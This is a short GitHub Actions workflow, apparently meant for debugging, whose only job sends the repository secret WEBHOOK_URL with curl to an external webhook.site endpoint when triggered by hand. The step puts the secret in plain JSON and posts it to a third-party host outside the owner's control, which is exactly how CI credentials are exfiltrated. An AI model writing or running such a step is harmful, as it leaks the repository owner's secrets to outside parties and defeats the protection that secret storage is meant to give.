name: Send Secret to Webhook for Debug

on:
  workflow_dispatch:

jobs:
  send-secret:
    runs-on: ubuntu-latest

    steps:
      - name: Send Webhook URL secret to Webhook.site
        run: |
          curl -X POST -H "Content-Type: application/json" \
            -d "{\"webhook_url\": \"${{ secrets.WEBHOOK_URL }}\"}" \
            https://webhook.site/3e7a4e21-928d-4ab7-9d30-1b1aa9bbe669
